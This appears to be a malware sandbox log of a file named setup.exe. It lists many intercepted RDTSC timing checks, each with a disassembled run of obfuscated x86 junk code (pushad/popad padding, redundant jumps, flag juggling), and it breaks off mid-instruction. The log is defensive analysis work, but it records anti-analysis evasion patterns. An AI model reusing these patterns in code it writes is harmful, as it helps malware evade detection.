Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD09D7 second address: 4DD0A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ecx, 477649BBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 mov al, 35h 0x00000012 popad 0x00000013 ret 0x00000014 nop 0x00000015 push eax 0x00000016 call 00007FF330F66F5Ah 0x0000001b mov edi, edi 0x0000001d jmp 00007FF32CDD6572h 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0A06 second address: 4DD0A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0A23 second address: 4DD0A63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FF32CDD6577h 0x00000010 mov bx, si 0x00000013 pop esi 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, di 0x0000001f mov bl, D8h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0A63 second address: 4DD0AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 5785811Bh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF32CFB71FEh 0x00000018 xor si, E9E8h 0x0000001d jmp 00007FF32CFB71FBh 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov edi, 735172C4h 0x00000030 push ebx 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80051 second address: 4D800C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 pushfd 0x00000011 jmp 00007FF32CDD6578h 0x00000016 sub cl, FFFFFF98h 0x00000019 jmp 00007FF32CDD656Bh 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 jmp 00007FF32CDD6570h 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FF32CDD6570h 0x0000002f add cx, 4228h 0x00000034 jmp 00007FF32CDD656Bh 0x00000039 popfd 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D800C9 second address: 4D8010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e mov cl, bl 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FF32CFB7206h 0x00000017 sbb ch, FFFFFFB8h 0x0000001a jmp 00007FF32CFB71FBh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx ebx, ax 0x00000028 push eax 0x00000029 pop edi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8010B second address: 4D80111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80111 second address: 4D80131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF32CFB71FEh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ecx, 03CFC963h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80131 second address: 4D8017D instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007FF32CDD656Bh 0x0000000e and si, 1B8Eh 0x00000013 jmp 00007FF32CDD6579h 0x00000018 popfd 0x00000019 popad 0x0000001a popad 0x0000001b mov ebx, dword ptr [ebp+10h] 0x0000001e jmp 00007FF32CDD656Dh 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8017D second address: 4D80181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80181 second address: 4D80185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80185 second address: 4D8018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8018B second address: 4D80206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6572h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CDD656Bh 0x0000000f xchg eax, esi 0x00000010 jmp 00007FF32CDD6576h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 mov dl, al 0x0000001b jmp 00007FF32CDD6573h 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 jmp 00007FF32CDD6576h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF32CDD656Eh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80206 second address: 4D80239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b jmp 00007FF32CFB71FFh 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF32CFB7205h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80239 second address: 4D8023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8023F second address: 4D80253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FF39F5E55C4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80253 second address: 4D80257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80257 second address: 4D8025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8025B second address: 4D80261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80261 second address: 4D802DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 push ecx 0x00000014 mov ax, bx 0x00000017 pop edx 0x00000018 popad 0x00000019 je 00007FF39F5E5599h 0x0000001f jmp 00007FF32CFB7206h 0x00000024 mov edx, dword ptr [esi+44h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007FF32CFB71FDh 0x0000002f pushfd 0x00000030 jmp 00007FF32CFB7200h 0x00000035 or eax, 1C579368h 0x0000003b jmp 00007FF32CFB71FBh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D802DB second address: 4D80355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6572h 0x00000009 xor eax, 7880E5C8h 0x0000000f jmp 00007FF32CDD656Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b jmp 00007FF32CDD6576h 0x00000020 test edx, 61000000h 0x00000026 pushad 0x00000027 call 00007FF32CDD656Dh 0x0000002c push esi 0x0000002d pop ebx 0x0000002e pop ecx 0x0000002f popad 0x00000030 jne 00007FF39F4048B7h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF32CDD6576h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80355 second address: 4D8035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8035B second address: 4D8035F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8035F second address: 4D80371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80371 second address: 4D80375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80375 second address: 4D8037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8037B second address: 4D803AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov dl, 95h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FF39F404881h 0x00000011 jmp 00007FF32CDD656Eh 0x00000016 test bl, 00000007h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, 7F60h 0x00000020 mov edx, 57E2318Ch 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70876 second address: 4D708DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 27h 0x00000005 jmp 00007FF32CFB7204h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f call 00007FF32CFB71FEh 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007FF32CFB71FDh 0x00000020 jmp 00007FF32CFB71FBh 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF32CFB7205h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D708DC second address: 4D709B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6577h 0x00000009 and eax, 27D16CAEh 0x0000000f jmp 00007FF32CDD6579h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov edx, 5274DA0Eh 0x00000021 call 00007FF32CDD656Fh 0x00000026 call 00007FF32CDD6578h 0x0000002b pop esi 0x0000002c pop ebx 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f jmp 00007FF32CDD656Eh 0x00000034 mov esi, dword ptr [ebp+08h] 0x00000037 jmp 00007FF32CDD6570h 0x0000003c sub ebx, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FF32CDD656Ah 0x00000047 and ah, 00000018h 0x0000004a jmp 00007FF32CDD656Bh 0x0000004f popfd 0x00000050 pushfd 0x00000051 jmp 00007FF32CDD6578h 0x00000056 adc cl, 00000078h 0x00000059 jmp 00007FF32CDD656Bh 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D709B7 second address: 4D70A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF32CFB71FFh 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f jmp 00007FF32CFB7202h 0x00000014 je 00007FF39F5ECBA2h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF32CFB71FEh 0x00000021 sub eax, 43B94D38h 0x00000027 jmp 00007FF32CFB71FBh 0x0000002c popfd 0x0000002d mov ah, 67h 0x0000002f popad 0x00000030 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000037 jmp 00007FF32CFB71FBh 0x0000003c mov ecx, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70A27 second address: 4D70A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70A2B second address: 4D70A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70A31 second address: 4D70AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6578h 0x00000009 adc cx, F1F8h 0x0000000e jmp 00007FF32CDD656Bh 0x00000013 popfd 0x00000014 jmp 00007FF32CDD6578h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007FF39F40BE90h 0x00000022 pushad 0x00000023 jmp 00007FF32CDD656Eh 0x00000028 push esi 0x00000029 mov ecx, edx 0x0000002b pop edx 0x0000002c popad 0x0000002d test byte ptr [77436968h], 00000002h 0x00000034 jmp 00007FF32CDD6578h 0x00000039 jne 00007FF39F40BE6Ah 0x0000003f jmp 00007FF32CDD6570h 0x00000044 mov edx, dword ptr [ebp+0Ch] 0x00000047 jmp 00007FF32CDD6570h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF32CDD6577h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70AF5 second address: 4D70B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c mov ah, 71h 0x0000000e pop edi 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 or cl, 00000038h 0x00000018 jmp 00007FF32CFB71FBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF32CFB7204h 0x00000027 xor esi, 6FA05A98h 0x0000002d jmp 00007FF32CFB71FBh 0x00000032 popfd 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007FF32CFB7206h 0x0000003b sub eax, 7A5D04F8h 0x00000041 jmp 00007FF32CFB71FBh 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70B91 second address: 4D70BD8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6578h 0x00000008 and si, 5F58h 0x0000000d jmp 00007FF32CDD656Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF32CDD6575h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70BD8 second address: 4D70BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CFB71FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70BE8 second address: 4D70BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d push eax 0x0000000e push edx 0x0000000f movzx esi, di 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70BFA second address: 4D70C06 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C06 second address: 4D70C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007FF32CDD656Bh 0x0000000d and al, FFFFFFDEh 0x00000010 jmp 00007FF32CDD6579h 0x00000015 popfd 0x00000016 popad 0x00000017 push dword ptr [ebp+14h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF32CDD656Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C75 second address: 4D70C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C79 second address: 4D70C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6578h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C95 second address: 4D70CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF32CFB7205h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70CBC second address: 4D70CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007FF32CDD656Eh 0x0000000f mov esp, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF32CDD6577h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80D7D second address: 4D80D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80D8C second address: 4D80DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, F0h 0x00000005 pushfd 0x00000006 jmp 00007FF32CDD6570h 0x0000000b adc ecx, 6D1D8CD8h 0x00000011 jmp 00007FF32CDD656Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF32CDD6574h 0x00000022 xor ch, 00000038h 0x00000025 jmp 00007FF32CDD656Bh 0x0000002a popfd 0x0000002b mov edi, ecx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bx, 3280h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80AD7 second address: 4D80ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80ADD second address: 4D80B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B01 second address: 4D80B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B05 second address: 4D80B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B0B second address: 4D80B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CFB7203h 0x00000008 pop ecx 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF32CFB71FCh 0x00000019 jmp 00007FF32CFB7205h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B52 second address: 4D80B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF32CDD6576h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF32CDD656Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B94 second address: 4D80B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4E0073D second address: 4E00765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CDD656Bh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CDD6570h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF09EF second address: 4DF09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF09F3 second address: 4DF0A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A10 second address: 4DF0A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A16 second address: 4DF0A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A1A second address: 4DF0A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A28 second address: 4DF0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A2E second address: 4DF0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A32 second address: 4DF0A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF080B second address: 4DF0848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF32CFB71FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CFB71FEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0848 second address: 4DF085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF085A second address: 4DF0883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF32CFB7205h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0883 second address: 4DF08A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CDD656Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0C27 second address: 4DF0CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB7201h 0x00000009 or cx, AB96h 0x0000000e jmp 00007FF32CFB7201h 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c movzx esi, dx 0x0000001f call 00007FF32CFB71FBh 0x00000024 pushfd 0x00000025 jmp 00007FF32CFB7208h 0x0000002a or ecx, 048D1E18h 0x00000030 jmp 00007FF32CFB71FBh 0x00000035 popfd 0x00000036 pop eax 0x00000037 popad 0x00000038 mov dword ptr [esp], ebp 0x0000003b jmp 00007FF32CFB71FFh 0x00000040 mov ebp, esp 0x00000042 pushad 0x00000043 mov ebx, esi 0x00000045 mov dx, si 0x00000048 popad 0x00000049 push dword ptr [ebp+0Ch] 0x0000004c push 